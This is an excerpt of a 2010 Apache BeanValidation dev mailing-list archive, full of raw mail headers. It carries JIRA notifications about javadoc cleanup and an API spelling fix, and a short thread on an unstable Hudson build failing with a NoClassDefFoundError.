01:28:44 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 71103 invoked from network); 9 Jul 2010 01:28:44 -0000 Received: from unknown (HELO mail.apache.org) (161.129.204.104) by 161.129.204.104 with SMTP; 9 Jul 2010 01:28:44 -0000 Received: (qmail 74630 invoked by uid 500); 9 Jul 2010 01:28:44 -0000 Delivered-To: [email protected] Received: (qmail 74593 invoked by uid 500); 9 Jul 2010 01:28:43 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <bval-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 74585 invoked by uid 99); 9 Jul 2010 01:28:43 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 09 Jul 2010 01:28:43 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO thor.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 09 Jul 2010 01:28:41 +0000 Received: from thor (localhost [161.129.204.104]) by thor.apache.org (8.13.8+Sun/8.13.8) with ESMTP id o691Kn9h026744 for <[email protected]>; Fri, 9 Jul 2010 01:20:49 GMT Message-ID: <30845470.275461278638449665.JavaMail.jira@thor> Date: Thu, 8 Jul 2010 21:20:49 -0400 (EDT) From: "David Jencks (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Commented: (BVAL-75) javadocs, compiler (generics) warnings, etc. In-Reply-To: <125694.271831278628429563.JavaMail.jira@thor> MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-JIRA-FingerPrint: 30527f35849b9dde25b450d4833f0394 X-Virus-Checked: Checked by ClamAV on apache.org [ https://issues.apache.org/jira/browse/BVAL-75?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=12886579#action_12886579 ] David Jencks commented on BVAL-75: ---------------------------------- If anyone does figure out how to make {@inheritDoc} work, they also need to 1. verify that the javadoc in whatever the source is can be redistributed by apache under an acceptable license (most javadoc from sun can't AFAICT) 2. modify the LICENSE and NOTICE files whereever that copied javadoc shows up to show the license and provide appropriate attributions. Personally, I've generally thought that it wasn't worth the effort to try to overcome these problems to include someone else's javadoc. > javadocs, compiler (generics) warnings, etc. > -------------------------------------------- > > Key: BVAL-75 > URL: https://issues.apache.org/jira/browse/BVAL-75 > Project: BeanValidation > Issue Type: Improvement > Components: jsr303 > Affects Versions: 0.2-incubating > Reporter: Matt Benson > Attachments: core.patch.txt, jsr303.patch.txt > > > Driven by my desire to understand the structure of bval, I undertook the exercise of completing the javadoc, and cleaning up as many compiler warnings as was practical, in the core and jsr303 modules. > "etc." includes such things as small (method-scoped) refactorings, occasional expansion of wildcard imports, and TODO comments to note possible improvements for future consideration. I will attach a separate patch for each of the modules I have worked on. > (jsr303 component selected; "core" not available) -- This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue online. From [email protected] Fri Jul 09 03:04:20 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 92743 invoked from network); 9 Jul 2010 03:04:20 -0000 Received: from unknown (HELO mail.apache.org) (161.129.204.104) by 161.129.204.104 with SMTP; 9 Jul 2010 03:04:20 -0000 Received: (qmail 36367 invoked by uid 500); 9 Jul 2010 03:04:19 -0000 Delivered-To: [email protected] Received: (qmail 36292 invoked by uid 500); 9 Jul 2010 03:04:18 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <bval-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 36158 invoked by uid 99); 9 Jul 2010 03:04:16 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 09 Jul 2010 03:04:16 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO thor.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 09 Jul 2010 03:02:28 +0000 Received: from thor (localhost [161.129.204.104]) by thor.apache.org (8.13.8+Sun/8.13.8) with ESMTP id o69326kd027450 for <[email protected]>; Fri, 9 Jul 2010 03:02:06 GMT Message-ID: <16776636.276501278644526700.JavaMail.jira@thor> Date: Thu, 8 Jul 2010 23:02:06 -0400 (EDT) From: "Matt Benson (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Commented: (BVAL-75) javadocs, compiler (generics) warnings, etc. In-Reply-To: <125694.271831278628429563.JavaMail.jira@thor> MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-JIRA-FingerPrint: 30527f35849b9dde25b450d4833f0394 X-Virus-Checked: Checked by ClamAV on apache.org [ https://issues.apache.org/jira/browse/BVAL-75?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=12886597#action_12886597 ] Matt Benson commented on BVAL-75: --------------------------------- @David: the RI spec is released under the ASL v2. Alternatively, we could rewrite the javadoc for the Geronimo-provided spec, contribute that, and push to have it released. > javadocs, compiler (generics) warnings, etc. > -------------------------------------------- > > Key: BVAL-75 > URL: https://issues.apache.org/jira/browse/BVAL-75 > Project: BeanValidation > Issue Type: Improvement > Components: jsr303 > Affects Versions: 0.2-incubating > Reporter: Matt Benson > Attachments: core.patch.txt, jsr303.patch.txt > > > Driven by my desire to understand the structure of bval, I undertook the exercise of completing the javadoc, and cleaning up as many compiler warnings as was practical, in the core and jsr303 modules. > "etc." includes such things as small (method-scoped) refactorings, occasional expansion of wildcard imports, and TODO comments to note possible improvements for future consideration. I will attach a separate patch for each of the modules I have worked on. > (jsr303 component selected; "core" not available) -- This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue online. From [email protected] Fri Jul 09 10:01:46 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 92106 invoked from network); 9 Jul 2010 10:01:46 -0000 Received: from unknown (HELO mail.apache.org) (161.129.204.104) by 161.129.204.104 with SMTP; 9 Jul 2010 10:01:46 -0000 Received: (qmail 99568 invoked by uid 500); 9 Jul 2010 10:01:46 -0000 Delivered-To: [email protected] Received: (qmail 98876 invoked by uid 500); 9 Jul 2010 10:01:45 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <bval-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 98374 invoked by uid 99); 9 Jul 2010 10:01:44 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 09 Jul 2010 10:01:44 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO thor.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 09 Jul 2010 10:01:41 +0000 Received: from thor (localhost [161.129.204.104]) by thor.apache.org (8.13.8+Sun/8.13.8) with ESMTP id o699roSi001008 for <[email protected]>; Fri, 9 Jul 2010 09:53:50 GMT Message-ID: <8166731.281291278669230347.JavaMail.jira@thor> Date: Fri, 9 Jul 2010 05:53:50 -0400 (EDT) From: "Carlos Vara (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Assigned: (BVAL-75) javadocs, compiler (generics) warnings, etc. In-Reply-To: <125694.271831278628429563.JavaMail.jira@thor> MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-JIRA-FingerPrint: 30527f35849b9dde25b450d4833f0394 X-Virus-Checked: Checked by ClamAV on apache.org [ https://issues.apache.org/jira/browse/BVAL-75?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] Carlos Vara reassigned BVAL-75: ------------------------------- Assignee: Carlos Vara > javadocs, compiler (generics) warnings, etc. > -------------------------------------------- > > Key: BVAL-75 > URL: https://issues.apache.org/jira/browse/BVAL-75 > Project: BeanValidation > Issue Type: Improvement > Components: jsr303 > Affects Versions: 0.2-incubating > Reporter: Matt Benson > Assignee: Carlos Vara > Attachments: core.patch.txt, jsr303.patch.txt > > > Driven by my desire to understand the structure of bval, I undertook the exercise of completing the javadoc, and cleaning up as many compiler warnings as was practical, in the core and jsr303 modules. > "etc." includes such things as small (method-scoped) refactorings, occasional expansion of wildcard imports, and TODO comments to note possible improvements for future consideration. I will attach a separate patch for each of the modules I have worked on. > (jsr303 component selected; "core" not available) -- This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue online. From [email protected] Fri Jul 09 16:39:21 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 37099 invoked from network); 9 Jul 2010 16:39:21 -0000 Received: from unknown (HELO mail.apache.org) (161.129.204.104) by 161.129.204.104 with SMTP; 9 Jul 2010 16:39:21 -0000 Received: (qmail 21999 invoked by uid 500); 9 Jul 2010 16:39:21 -0000 Delivered-To: [email protected] Received: (qmail 21962 invoked by uid 500); 9 Jul 2010 16:39:21 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <bval-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 21954 invoked by uid 99); 9 Jul 2010 16:39:21 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 09 Jul 2010 16:39:21 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO thor.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 09 Jul 2010 16:39:18 +0000 Received: from thor (localhost [161.129.204.104]) by thor.apache.org (8.13.8+Sun/8.13.8) with ESMTP id o69Gcu10005396 for <[email protected]>; Fri, 9 Jul 2010 16:38:56 GMT Message-ID: <11413790.285911278693536396.JavaMail.jira@thor> Date: Fri, 9 Jul 2010 12:38:56 -0400 (EDT) From: "Carlos Vara (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Resolved: (BVAL-75) javadocs, compiler (generics) warnings, etc. In-Reply-To: <125694.271831278628429563.JavaMail.jira@thor> MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-JIRA-FingerPrint: 30527f35849b9dde25b450d4833f0394 X-Virus-Checked: Checked by ClamAV on apache.org [ https://issues.apache.org/jira/browse/BVAL-75?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] Carlos Vara resolved BVAL-75. ----------------------------- Fix Version/s: 0.2-incubating Resolution: Fixed Patches applied in rev 962604, project's tests and TCK pass and compilation is fine under JDK 1.6 and 1.5. Great work Matt, code is much cleaner now! And you also added some very valid TODOs in there. A few notes: - There are a some @SuppressWarnings("unchecked"), we should probably work on removing those were possible. - The star imports are due to a non unified formatting style in the team. I think a discussion in the dev list to agree on a common style would be very benefitial for the project. - In ClassHelper, I had to change: List<Class<?>> subClasses = new ArrayList<Class<?>>(Arrays.asList(clazz.getInterfaces())); with List<Class<?>> subClasses = new ArrayList(Arrays.asList(clazz.getInterfaces())); for the project to compile under JDK 1.5 > javadocs, compiler (generics) warnings, etc. > -------------------------------------------- > > Key: BVAL-75 > URL: https://issues.apache.org/jira/browse/BVAL-75 > Project: BeanValidation > Issue Type: Improvement > Components: jsr303 > Affects Versions: 0.2-incubating > Reporter: Matt Benson > Assignee: Carlos Vara > Fix For: 0.2-incubating > > Attachments: core.patch.txt, jsr303.patch.txt > > > Driven by my desire to understand the structure of bval, I undertook the exercise of completing the javadoc, and cleaning up as many compiler warnings as was practical, in the core and jsr303 modules. > "etc." includes such things as small (method-scoped) refactorings, occasional expansion of wildcard imports, and TODO comments to note possible improvements for future consideration. I will attach a separate patch for each of the modules I have worked on. > (jsr303 component selected; "core" not available) -- This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue online. From [email protected] Fri Jul 09 17:01:23 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 42391 invoked from network); 9 Jul 2010 17:01:22 -0000 Received: from unknown (HELO mail.apache.org) (161.129.204.104) by 161.129.204.104 with SMTP; 9 Jul 2010 17:01:22 -0000 Received: (qmail 54094 invoked by uid 500); 9 Jul 2010 17:01:22 -0000 Delivered-To: [email protected] Received: (qmail 53956 invoked by uid 500); 9 Jul 2010 17:01:22 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <bval-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 53948 invoked by uid 99); 9 Jul 2010 17:01:22 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 09 Jul 2010 17:01:22 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO thor.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 09 Jul 2010 17:01:19 +0000 Received: from thor (localhost [161.129.204.104]) by thor.apache.org (8.13.8+Sun/8.13.8) with ESMTP id o69H0vcP005602 for <[email protected]>; Fri, 9 Jul 2010 17:00:57 GMT Message-ID: <11200891.286291278694857368.JavaMail.jira@thor> Date: Fri, 9 Jul 2010 13:00:57 -0400 (EDT) From: "Matt Benson (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Created: (BVAL-76) Correct spelling error in API: ConstraintValidationListener.getConstaintViolations() MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-JIRA-FingerPrint: 30527f35849b9dde25b450d4833f0394 X-Virus-Checked: Checked by ClamAV on apache.org Correct spelling error in API: ConstraintValidationListener.getConstaintViolations() ------------------------------------------------------------------------------------- Key: BVAL-76 URL: https://issues.apache.org/jira/browse/BVAL-76 Project: BeanValidation Issue Type: Improvement Components: jsr303 Affects Versions: 0.2-incubating Reporter: Matt Benson -- This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue online. From [email protected] Fri Jul 09 17:03:14 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 43386 invoked from network); 9 Jul 2010 17:03:14 -0000 Received: from unknown (HELO mail.apache.org) (161.129.204.104) by 161.129.204.104 with SMTP; 9 Jul 2010 17:03:14 -0000 Received: (qmail 55457 invoked by uid 500); 9 Jul 2010 17:03:14 -0000 Delivered-To: [email protected] Received: (qmail 55418 invoked by uid 500); 9 Jul 2010 17:03:14 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <bval-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 55410 invoked by uid 99); 9 Jul 2010 17:03:14 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 09 Jul 2010 17:03:14 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO thor.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 09 Jul 2010 17:03:11 +0000 Received: from thor (localhost [161.129.204.104]) by thor.apache.org (8.13.8+Sun/8.13.8) with ESMTP id o69H2n8j005655 for <[email protected]>; Fri, 9 Jul 2010 17:02:50 GMT Message-ID: <9511060.286321278694969665.JavaMail.jira@thor> Date: Fri, 9 Jul 2010 13:02:49 -0400 (EDT) From: "Matt Benson (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Updated: (BVAL-76) Correct spelling error in API: ConstraintValidationListener.getConstaintViolations() In-Reply-To: <11200891.286291278694857368.JavaMail.jira@thor> MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-JIRA-FingerPrint: 30527f35849b9dde25b450d4833f0394 X-Virus-Checked: Checked by ClamAV on apache.org [ https://issues.apache.org/jira/browse/BVAL-76?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] Matt Benson updated BVAL-76: ---------------------------- Attachment: BVAL-76.patch.txt > Correct spelling error in API: ConstraintValidationListener.getConstaintViolations() > ------------------------------------------------------------------------------------- > > Key: BVAL-76 > URL: https://issues.apache.org/jira/browse/BVAL-76 > Project: BeanValidation > Issue Type: Improvement > Components: jsr303 > Affects Versions: 0.2-incubating > Reporter: Matt Benson > Attachments: BVAL-76.patch.txt > > -- This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue online. From [email protected] Fri Jul 09 17:49:25 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 54778 invoked from network); 9 Jul 2010 17:49:25 -0000 Received: from unknown (HELO mail.apache.org) (161.129.204.104) by 161.129.204.104 with SMTP; 9 Jul 2010 17:49:25 -0000 Received: (qmail 4509 invoked by uid 500); 9 Jul 2010 17:49:25 -0000 Delivered-To: [email protected] Received: (qmail 4467 invoked by uid 500); 9 Jul 2010 17:49:25 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <bval-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 4459 invoked by uid 99); 9 Jul 2010 17:49:25 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 09 Jul 2010 17:49:25 +0000 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests=FREEMAIL_FROM,RCVD_IN_DNSWL_NONE,SPF_PASS,T_TO_NO_BRKTS_FREEMAIL X-Spam-Check-By: apache.org Received-SPF: pass (nike.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO mail-yx0-f175.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 09 Jul 2010 17:49:16 +0000 Received: by yxl31 with SMTP id 31so564232yxl.6 for <[email protected]>; Fri, 09 Jul 2010 10:47:55 -0700 (PDT) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=gamma; h=domainkey-signature:received:received:content-type:mime-version :subject:from:in-reply-to:date:content-transfer-encoding:message-id :references:to:x-mailer; bh=DmxIj5bp8IN5/m10B0iWf1dQ51MO47Dv2R9TKGW42HM=; b=SBnNJ8ez0uUCAYXXtDfZYmKQFu3eorZWYJ+Gg5hODGlOcV15jKeMM12QewgaRe/bZm WfoTow6sWfb+25U6BEMPNpL1hqAPs4EWvHZJ6ip3GACfjNh+nP+7ehT5adTWUnR96obp HtAsC6fuYfYPzd3N6EjvGip28HHxUqUHVi39o= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=gamma; h=content-type:mime-version:subject:from:in-reply-to:date :content-transfer-encoding:message-id:references:to:x-mailer; b=o6YqPYKpG5f+1UmCbwI825dVWaGkryCrHKNXJseZU0RPFj/iM27SjczaJ+wvYnnkCT +82CpvzyZuo7lEvHdx963FYMRf0MpfLEcr3PyS9SY1+sDsHcB37vh9pHXiT9cQVF0riy HcXkPEGPvcKxpC1Yk8Brp2a0yhfU1DdfDNreE= Received: by 161.129.204.104 with SMTP id d3mr2364540ybf.28.1278697674937; Fri, 09 Jul 2010 10:47:54 -0700 (PDT) Received: from [161.129.204.104] (adsl-068-213-090-227.sip.bhm.bellsouth.net [161.129.204.104]) by mx.google.com with ESMTPS id r42sm402335yba.0.2161.129.204.104.47.53 (version=TLSv1/SSLv3 cipher=RC4-MD5); Fri, 09 Jul 2010 10:47:54 -0700 (PDT) Content-Type: text/plain; charset=us-ascii Mime-Version: 1.0 (Apple Message framework v1081) Subject: Re: Hudson build is still unstable: BeanValidation-trunk-windows #40 From: Matt Benson <[email protected]> In-Reply-To: <[email protected]> Date: Fri, 9 Jul 2010 12:47:51 -0500 Content-Transfer-Encoding: quoted-printable Message-Id: <[email protected]> References: <[email protected]> <[email protected]> To: [email protected] X-Mailer: Apple Mail (2.1081) X-Virus-Checked: Checked by ClamAV on apache.org I see this has happened before; anyone know what fixes it? :| -Matt On Jul 9, 2010, at 12:43 PM, Apache Hudson Server wrote: > See = <http://hudson.zones.apache.org/hudson/job/BeanValidation-trunk-windows/ch= anges> >=20 >=20 From [email protected] Fri Jul 09 18:26:16 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 73417 invoked from network); 9 Jul 2010 18:26:15 -0000 Received: from unknown (HELO mail.apache.org) (161.129.204.104) by 161.129.204.104 with SMTP; 9 Jul 2010 18:26:15 -0000 Received: (qmail 40148 invoked by uid 500); 9 Jul 2010 18:26:15 -0000 Delivered-To: [email protected] Received: (qmail 40121 invoked by uid 500); 9 Jul 2010 18:26:15 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <bval-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 40113 invoked by uid 99); 9 Jul 2010 18:26:15 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 09 Jul 2010 18:26:15 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO thor.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 09 Jul 2010 18:26:13 +0000 Received: from thor (localhost [161.129.204.104]) by thor.apache.org (8.13.8+Sun/8.13.8) with ESMTP id o69IPprI006790 for <[email protected]>; Fri, 9 Jul 2010 18:25:51 GMT Message-ID: <33233624.289221278699951293.JavaMail.jira@thor> Date: Fri, 9 Jul 2010 14:25:51 -0400 (EDT) From: "Donald Woods (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Assigned: (BVAL-76) Correct spelling error in API: ConstraintValidationListener.getConstaintViolations() In-Reply-To: <11200891.286291278694857368.JavaMail.jira@thor> MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-JIRA-FingerPrint: 30527f35849b9dde25b450d4833f0394 X-Virus-Checked: Checked by ClamAV on apache.org [ https://issues.apache.org/jira/browse/BVAL-76?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] Donald Woods reassigned BVAL-76: -------------------------------- Assignee: Donald Woods > Correct spelling error in API: ConstraintValidationListener.getConstaintViolations() > ------------------------------------------------------------------------------------- > > Key: BVAL-76 > URL: https://issues.apache.org/jira/browse/BVAL-76 > Project: BeanValidation > Issue Type: Improvement > Components: jsr303 > Affects Versions: 0.2-incubating > Reporter: Matt Benson > Assignee: Donald Woods > Attachments: BVAL-76.patch.txt > > -- This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue online. From [email protected] Fri Jul 09 18:27:59 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 73595 invoked from network); 9 Jul 2010 18:27:59 -0000 Received: from unknown (HELO mail.apache.org) (161.129.204.104) by 161.129.204.104 with SMTP; 9 Jul 2010 18:27:59 -0000 Received: (qmail 40819 invoked by uid 500); 9 Jul 2010 18:27:59 -0000 Delivered-To: [email protected] Received: (qmail 40776 invoked by uid 500); 9 Jul 2010 18:27:58 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <bval-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 40768 invoked by uid 99); 9 Jul 2010 18:27:58 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 09 Jul 2010 18:27:58 +0000 X-ASF-Spam-Status: No, hits=0.7 required=10.0 tests=RCVD_IN_DNSWL_NONE,SPF_NEUTRAL,UNPARSEABLE_RELAY X-Spam-Check-By: apache.org Received-SPF: neutral (nike.apache.org: local policy) Received: from [161.129.204.104] (HELO smtp104.prem.mail.ac4.yahoo.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with SMTP; Fri, 09 Jul 2010 18:27:50 +0000 Received: (qmail 72412 invoked from network); 9 Jul 2010 18:26:29 -0000 Received: from drwoods.local ([email protected] with plain) by smtp104.prem.mail.ac4.yahoo.com with SMTP; 09 Jul 2010 11:26:29 -0700 PDT X-Yahoo-SMTP: sCI.ryiswBB7FW.DxjU523c87MI- X-YMail-OSG: 3iieH4oVM1kWPoHGPIwHMd47noB3zaUzgyfVxHXsxx9Yswc FxV_IxGrq4X8vXR5968jF.Mwcw_7LlIj8V8h31Rgr59oeiYJgKaMvFSZHFjA stCw5_yhKBeoBQnt5LV8Y_NsUJ.io_0raiHMOcWUDSmtV.RtIT.thM5TZlWz .PBlEFPTrKtgUedIArdOnAKGRsnav4E0A_1tbjB2aIKD3R.2A.m4hbZssH6h AVXLffGmmAGN_sBn.HHZQBX_HNZPWp.mU.uDI1TmlLnE6RM4LQ5N8znlLHb5 xVG6SQA2zWXHoG3Mx0EpSxOGsEVOeOt49h95nT5OfoBWFLes- X-Yahoo-Newman-Property: ymail-3 Message-ID: <[email protected]> Date: Fri, 09 Jul 2010 14:26:28 -0400 From: Donald Woods <[email protected]> User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:161.129.204.104) Gecko/20100608 Lightning/1.0b2 Thunderbird/3.1 MIME-Version: 1.0 To: [email protected] Subject: Re: Hudson build is still unstable: BeanValidation-trunk-windows #40 References: <[email protected]> <[email protected]> <[email protected]> In-Reply-To: <[email protected]> X-Enigmail-Version: 1.1.1 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked by ClamAV on apache.org Well, these look like valid failuresin bval-guice due to recent changes (I can recreate on my Mac with 1.6.0_20)... All 4 failures have the same cause - Error injecting constructor, java.lang.NoClassDefFoundError: org/apache/bval/xml/XMLMetaBeanManager at org.apache.bval.guice.ValidatorProvider.<init>(ValidatorProvider.java:45) while locating org.apache.bval.guice.ValidatorProvider while locating javax.validation.Validator for [email protected](ValidateMethodInterceptor.java:53) at org.apache.bval.guice.ValidationModule.configure(ValidationModule.java:60) On 7/9/10 1:47 PM, Matt Benson wrote: > I see this has happened before; anyone know what fixes it? :| > > -Matt > > On Jul 9, 2010, at 12:43 PM, Apache Hudson Server wrote: > >> See <http://hudson.zones.apache.org/hudson/job/BeanValidation-trunk-windows/changes> >> >> > > From [email protected] Fri Jul 09 18:33:40 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 74809 invoked from network); 9 Jul 2010 18:33:40 -0000 Received: from unknown (HELO mail.apache.org) (161.129.204.104) by 161.129.204.104 with SMTP; 9 Jul 2010 18:33:40 -0000 Received: (qmail 43971 invoked by uid 500); 9 Jul 2010 18:33:40 -0000 Delivered-To: [email protected] Received: (qmail 43933 invoked by uid 500); 9 Jul 2010 18:33:39 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <bval-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 43925 invoked by uid 99); 9 Jul 2010 18:33:39 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 09 Jul 2010 18:33:39 +0000 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests=FREEMAIL_FROM,RCVD_IN_DNSWL_NONE,SPF_PASS,T_TO_NO_BRKTS_FREEMAIL X-Spam-Check-By: apache.org Received-SPF: pass (nike.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO mail-gw0-f47.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 09 Jul 2010 18:33:30 +0000 Received: by gwj22 with SMTP id 22so1597411gwj.6 for <[email protected]>; Fri, 09 Jul 2010 11:32:09 -0700 (PDT) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=gamma; h=domainkey-signature:received:received:content-type:mime-version :subject:from:in-reply-to:date:content-transfer-encoding:message-id :references:to:x-mailer; bh=RuczSE8NRQc0D3mvtlxrCwKyT+q6xiZMT41m8EgX6sU=; b=P/pKFUeqzAbHEIgxln9WqTvUw71X5PC+NsvQdoKzJ0v8SO+qGt0jW4w01iTyTadWxk 92w8GwnF8ug99mEFt4rb9LXd0XwWlWx5OvJDBmPJVZrFH6g1/DNbvwERGxFr06DkOQft 